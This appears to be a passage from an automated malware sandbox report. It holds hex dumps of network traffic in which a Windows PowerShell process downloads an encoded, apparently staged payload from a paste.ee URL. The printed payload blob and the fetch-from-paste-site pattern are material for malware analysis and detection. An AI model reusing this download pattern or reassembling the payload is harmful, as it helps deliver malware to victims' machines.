                                                                            2024-12-17 06:21:22 UTC1378INData Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
                                                                            Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
                                                                            2024-12-17 06:21:22 UTC1378INData Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
                                                                            Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
                                                                            2024-12-17 06:21:22 UTC1378INData Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                                            Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                                            2024-12-17 06:21:22 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                                            Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
                                                                            2024-12-17 06:21:22 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                                            Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                                            2024-12-17 06:21:22 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                            Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
                                                                            2024-12-17 06:21:22 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                            Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                            2024-12-17 06:21:22 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                            Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.449738172.67.187.2004436312C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-17 06:21:43 UTC67OUTGET /r/HtMmw/0 HTTP/1.1
                                                                            Host: paste.ee
                                                                            Connection: Keep-Alive
                                                                            2024-12-17 06:21:44 UTC1275INHTTP/1.1 200 OK
                                                                            Date: Tue, 17 Dec 2024 06:21:44 GMT
                                                                            Content-Type: text/plain; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Cache-Control: max-age=2592000
                                                                            strict-transport-security: max-age=63072000
                                                                            x-frame-options: DENY
                                                                            x-content-type-options: nosniff
                                                                            x-xss-protection: 1; mode=block
                                                                            content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                            CF-Cache-Status: MISS
                                                                            Last-Modified: Tue, 17 Dec 2024 06:21:44 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LIz8DWT62yTxNyUyiplyPXs9MhWWYIDC%2Fp6YYeNKZOaPaOMN7yRFWFr1ZamsaSEjg2b5mdjrkTGejP680ewqwOlwt6FL4%2FHxTx3b6hTneo%2BcGpb4J7WgYuPwqA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f34d08bec597ce7-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-12-17 06:21:44 UTC216INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 39 34 36 26 6d 69 6e 5f 72 74 74 3d 31 38 33 35 26 72 74 74 5f 76 61 72 3d 37 36 37 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 35 39 31 32 38 30 26 63 77 6e 64 3d 31 39 33 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 39 61 61 66 30 61 61 36 61 65 32 38 32 61 36 62 26 74 73 3d 31 30 31 33 26 78 3d 30 22 0d 0a 0d 0a
                                                                            Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1946&min_rtt=1835&rtt_var=767&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=1591280&cwnd=193&unsent_bytes=0&cid=9aaf0aa6ae282a6b&ts=1013&x=0"
                                                                            2024-12-17 06:21:44 UTC1247INData Raw: 37 35 65 37 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35
                                                                            Data Ascii: 75e7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5
                                                                            2024-12-17 06:21:44 UTC1369INData Raw: 51 78 4e 38 66 44 39 33 41 2f 4e 73 66 44 36 33 67 39 4e 55 66 44 78 33 77 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 69 33 51 34 4e 30 64 44 58 33 51 31 4e 51 64 44 54 33 77 7a 4e 34 63 44 4b 33 41 78 4e 49 63 44 42 33 41 67 4e 38 62 44 37 32 67 75 4e 59 62 44 77 32 67 72 4e 30 61 44 73 32 41 71 4e 63 61 44 6a 32 51 6e 4e 73 5a 44 61 32 67 6c 4e 55 5a 44 52 32 77 69 4e 6b 59 44 49 32 41 68 4e 4d 55 44 39 31 41 66 4e 73 58 44 36 31 41 5a 4e 49 57 44 68 41 41 51 41 6b 42 67 42 41 44 41 41 41 73 44 61 37 51 47 4d 77 41 41 41 41 41 42 41 47 41 4c 41 37 41 7a 4f 6f 6f 44 31 36 41 74 4f 41 72 44 6d 36 67 6e 4f 55 70 44 50 36 67 6a 4f 6f 6f 44 45 35 41 65 4f 49 6e 44 72 35 67 61 4f 49 6d 44 68 35 41 59 4f 38 42 41 41 41 41 44 41 47 41 49 41 34 41 49 4f 38 68 44 41
                                                                            Data Ascii: QxN8fD93A/NsfD63g9NUfDx3w6NkeDo3w5NYeDi3Q4N0dDX3Q1NQdDT3wzN4cDK3AxNIcDB3AgN8bD72guNYbDw2grN0aDs2AqNcaDj2QnNsZDa2glNUZDR2wiNkYDI2AhNMUD91AfNsXD61AZNIWDhAAQAkBgBADAAAsDa7QGMwAAAAABAGALA7AzOooD16AtOArDm6gnOUpDP6gjOooDE5AeOInDr5gaOImDh5AYO8BAAAADAGAIA4AIO8hDA
                                                                            2024-12-17 06:21:44 UTC1369INData Raw: 72 4f 30 71 44 72 36 51 71 4f 63 71 44 6c 36 77 6f 4f 45 71 44 66 36 51 6e 4f 73 70 44 5a 36 77 6c 4f 55 70 44 54 36 51 6b 4f 38 6f 44 4e 36 77 69 4f 6b 6f 44 48 36 51 68 4f 4d 6f 44 42 35 77 66 4f 30 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44 74 34 77 4b 4f 6b 69 44 6e 34 51 4a 4f 4d 69 44 68 34 77 48 4f 30 68 44 62 34 51 47 4f 63 68 44 56 34 77 45 4f 45 68 44 50 34 51 44 4f 73 67 44 4a 34 77 42 4f 55 67 44 44 34 51 77 4e 38 66 44 39 33 77 2b 4e 6b 66 44 33 33 51 39 4e 4d 66 44 62 33
                                                                            Data Ascii: rO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDb3
                                                                            2024-12-17 06:21:44 UTC1369INData Raw: 4e 59 58 44 30 31 67 63 4e 41 58 44 75 31 41 62 4e 6f 57 44 6f 31 67 5a 4e 51 57 44 69 31 41 59 4e 34 56 44 63 31 67 57 4e 67 56 44 57 31 41 56 4e 49 56 44 51 31 67 54 4e 77 55 44 4b 31 41 53 4e 59 55 44 45 31 67 51 4e 41 51 44 2b 30 41 50 4e 6f 54 44 34 30 67 4e 4e 51 54 44 79 30 41 4d 4e 34 53 44 73 30 67 4b 4e 67 53 44 6d 30 41 4a 4e 49 53 44 67 30 67 48 4e 77 52 44 61 30 41 47 4e 59 52 44 55 30 67 45 4e 41 52 44 4f 30 41 44 4e 6f 51 44 49 30 67 42 4e 51 51 44 43 30 41 77 4d 34 50 44 38 7a 67 2b 4d 67 50 44 32 7a 41 39 4d 49 50 44 77 7a 67 37 4d 77 4f 44 71 7a 41 36 4d 59 4f 44 6b 7a 67 34 4d 41 4f 44 65 7a 41 33 4d 6f 4e 44 59 7a 67 31 4d 51 4e 44 53 7a 41 30 4d 34 4d 44 4d 7a 67 79 4d 67 4d 44 47 7a 41 78 4d 49 4d 44 41 79 67 76 4d 77 4c 44 36 79 41
                                                                            Data Ascii: NYXD01gcNAXDu1AbNoWDo1gZNQWDi1AYN4VDc1gWNgVDW1AVNIVDQ1gTNwUDK1ASNYUDE1gQNAQD+0APNoTD40gNNQTDy0AMN4SDs0gKNgSDm0AJNISDg0gHNwRDa0AGNYRDU0gENARDO0ADNoQDI0gBNQQDC0AwM4PD8zg+MgPD2zA9MIPDwzg7MwODqzA6MYODkzg4MAODezA3MoNDYzg1MQNDSzA0M4MDMzgyMgMDGzAxMIMDAygvMwLD6yA
                                                                            2024-12-17 06:21:44 UTC1369INData Raw: 63 70 44 56 36 77 6b 4f 45 70 44 50 36 51 6a 4f 73 6f 44 4a 36 77 68 4f 55 6f 44 44 36 51 51 4f 38 6e 44 39 35 77 65 4f 6b 6e 44 33 35 51 64 4f 4d 6e 44 78 35 77 62 4f 30 6d 44 72 35 51 61 4f 63 6d 44 6c 35 77 59 4f 45 6d 44 66 35 51 58 4f 73 6c 44 5a 35 77 56 4f 55 6c 44 54 35 51 55 4f 38 6b 44 4e 35 77 53 4f 6b 6b 44 48 35 51 52 4f 4d 6b 44 42 34 77 50 4f 30 6a 44 37 34 51 4f 4f 63 6a 44 31 34 77 4d 4f 45 6a 44 76 34 51 4c 4f 45 68 44 51 34 77 44 4f 34 67 44 4e 34 41 44 4f 73 67 44 4b 34 51 43 4f 67 67 44 48 34 67 42 4f 55 67 44 45 34 41 77 4e 38 66 44 2b 33 51 2f 4e 77 66 44 37 33 67 2b 4e 6b 66 44 34 33 77 39 4e 59 66 44 31 33 41 38 4e 38 65 44 75 33 51 37 4e 77 65 44 72 33 67 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 6c 33 41 35 4e 4d 65 44 69 33 51 34
                                                                            Data Ascii: cpDV6wkOEpDP6QjOsoDJ6whOUoDD6QQO8nD95weOknD35QdOMnDx5wbO0mDr5QaOcmDl5wYOEmDf5QXOslDZ5wVOUlDT5QUO8kDN5wSOkkDH5QROMkDB4wPO0jD74QOOcjD14wMOEjDv4QLOEhDQ4wDO4gDN4ADOsgDK4QCOggDH4gBOUgDE4AwN8fD+3Q/NwfD73g+NkfD43w9NYfD13A8N8eDu3Q7NweDr3g6NkeDo3w5NYeDl3A5NMeDi3Q4
                                                                            2024-12-17 06:21:44 UTC1369INData Raw: 38 54 30 2f 45 68 50 41 37 6a 64 2b 73 69 50 69 30 6a 74 39 30 61 50 77 30 7a 4a 38 51 4b 50 61 74 7a 59 36 4d 76 4f 2b 6d 6a 7a 35 73 62 4f 7a 67 54 2f 34 6b 53 4e 2f 51 54 35 30 51 33 4d 4e 4f 44 62 79 51 76 4d 54 4c 54 76 79 51 6f 4d 65 45 7a 37 78 55 63 4d 63 42 44 68 77 63 44 41 41 41 41 55 41 55 41 41 41 38 54 76 2f 73 36 50 69 34 44 33 39 4d 74 4f 57 6f 6a 44 36 59 51 4f 2b 6e 7a 39 34 49 7a 4e 32 66 44 35 33 49 39 4e 41 66 6a 72 32 6b 50 4e 51 4d 54 30 7a 38 37 4d 74 4f 7a 6d 7a 6b 34 4d 33 4e 54 5a 7a 4d 31 4d 42 4e 7a 4c 7a 30 78 4d 4c 49 54 2b 79 55 72 4d 68 4b 54 55 79 6f 6b 4d 50 45 54 2b 78 63 63 4d 37 47 44 6a 78 38 58 4d 42 46 44 49 78 59 52 4d 44 41 54 32 77 41 4e 4d 4a 44 7a 68 77 41 49 4d 47 42 44 4d 77 6b 42 4d 53 41 41 41 41 51 48 41
                                                                            Data Ascii: 8T0/EhPA7jd+siPi0jt90aPw0zJ8QKPatzY6MvO+mjz5sbOzgT/4kSN/QT50Q3MNODbyQvMTLTvyQoMeEz7xUcMcBDhwcDAAAAUAUAAA8Tv/s6Pi4D39MtOWojD6YQO+nz94IzN2fD53I9NAfjr2kPNQMT0z87MtOzmzk4M3NTZzM1MBNzLz0xMLIT+yUrMhKTUyokMPET+xccM7GDjx8XMBFDIxYRMDAT2wANMJDzhwAIMGBDMwkBMSAAAAQHA
                                                                            2024-12-17 06:21:44 UTC1369INData Raw: 6a 4c 7a 77 67 4d 65 4b 44 66 79 77 6d 4d 58 4a 54 54 78 77 61 4d 58 47 6a 6a 78 45 59 4d 32 46 44 49 78 67 42 4d 7a 44 7a 36 77 30 4c 4d 32 43 54 70 77 73 4a 4d 52 43 6a 69 77 73 48 4d 31 42 6a 62 77 4d 47 41 41 41 41 64 41 51 41 67 41 41 41 41 2b 63 75 50 63 37 44 66 2b 51 69 50 65 34 44 47 2b 55 51 50 33 33 7a 37 39 67 64 50 4f 33 7a 77 39 30 62 50 34 32 7a 6b 39 6f 59 50 6d 31 6a 58 39 38 52 50 58 77 6a 31 38 73 4d 50 34 78 6a 63 38 73 41 50 44 73 54 39 37 30 2b 4f 6b 76 7a 32 37 4d 39 4f 4c 76 7a 77 37 67 37 4f 6d 75 6a 6e 37 49 35 4f 4b 75 54 67 37 67 33 4f 77 74 44 61 37 41 32 4f 59 74 7a 53 37 38 7a 4f 33 6f 54 2b 36 30 73 4f 68 71 6a 65 36 51 6e 4f 75 70 44 61 36 41 6d 4f 63 70 54 55 36 49 6b 4f 32 6f 54 4a 36 6b 68 4f 48 6b 7a 34 35 51 64 4f 47
                                                                            Data Ascii: jLzwgMeKDfywmMXJTTxwaMXGjjxEYM2FDIxgBMzDz6w0LM2CTpwsJMRCjiwsHM1BjbwMGAAAAdAQAgAAAA+cuPc7Df+QiPe4DG+UQP33z79gdPO3zw90bP42zk9oYPm1jX98RPXwj18sMP4xjc8sAPDsT970+Okvz27M9OLvzw7g7Omujn7I5OKuTg7g3OwtDa7A2OYtzS78zO3oT+60sOhqje6QnOupDa6AmOcpTU6IkO2oTJ6khOHkz45QdOG
                                                                            2024-12-17 06:21:44 UTC1369INData Raw: 36 7a 49 74 4d 65 4b 54 62 79 49 6d 4d 48 4a 7a 49 79 63 51 4d 31 44 7a 7a 77 45 4c 4d 54 43 6a 54 41 41 41 41 30 43 41 42 67 41 41 41 41 38 44 5a 2f 63 31 50 48 39 6a 4f 2b 49 6f 50 43 35 44 4d 2b 4d 69 50 59 30 44 39 39 51 63 50 33 32 54 6e 39 49 44 50 79 76 7a 54 37 6f 54 4f 39 67 44 33 34 49 46 4f 49 63 7a 38 33 6b 35 4e 47 5a 54 4f 31 73 56 4e 34 55 44 43 7a 63 50 41 41 41 41 52 41 51 41 45 41 41 41 41 34 4d 65 4e 56 57 44 65 31 59 43 4e 41 50 44 71 79 73 75 4d 79 4b 44 6a 79 41 56 4d 7a 42 54 67 77 41 46 41 41 41 41 4a 41 51 41 41 41 38 6a 73 2f 30 32 50 36 34 44 36 2b 73 72 50 4f 32 44 33 39 63 43 50 33 76 6a 70 37 38 31 4f 45 6f 6a 39 34 34 37 4e 79 62 54 58 7a 6b 38 4d 35 4d 7a 45 79 59 76 4d 45 45 6a 48 41 41 41 41 30 41 77 41 77 44 67 50 7a 34
                                                                            Data Ascii: 6zItMeKTbyImMHJzIycQM1DzzwELMTCjTAAAA0CABgAAAA8DZ/c1PH9jO+IoPC5DM+MiPY0D99QcP32Tn9IDPyvzT7oTO9gD34IFOIcz83k5NGZTO1sVN4UDCzcPAAAARAQAEAAAA4MeNVWDe1YCNAPDqysuMyKDjyAVMzBTgwAFAAAAJAQAAA8js/02P64D6+srPO2D39cCP3vjp781OEoj9447NybTXzk8M5MzEyYvMEEjHAAAA0AwAwDgPz4
